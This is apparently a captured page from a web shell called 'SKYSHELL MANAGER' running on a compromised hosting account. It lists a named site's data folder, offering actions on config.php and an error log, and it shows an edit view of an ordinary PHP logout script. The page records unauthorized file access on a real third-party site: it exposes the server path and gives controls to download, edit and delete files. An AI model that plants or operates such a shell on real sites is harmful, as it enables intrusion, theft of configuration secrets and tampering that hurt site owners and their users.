📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
765.38 KB
0644
🗑️
⬇️
✏️
🔒
Editing: logout.php
<?php session_start(); $_SESSION = array(); if (isset($_COOKIE['idCookie'])) { setcookie("idCookie", '', time()-42000, '/'); setcookie("passCookie", '', time()-42000, '/'); } unset($_SESSION['id']); unset($_SESSION['email']); unset($_SESSION['password']); unset($_SESSION['name']); session_destroy(); if(!$_SESSION['id']){ header("location:index.php"); } else { print "<h2>Could not log you out, sorry the system encountered an error.</h2>"; exit(); } ?>
💾 Save Changes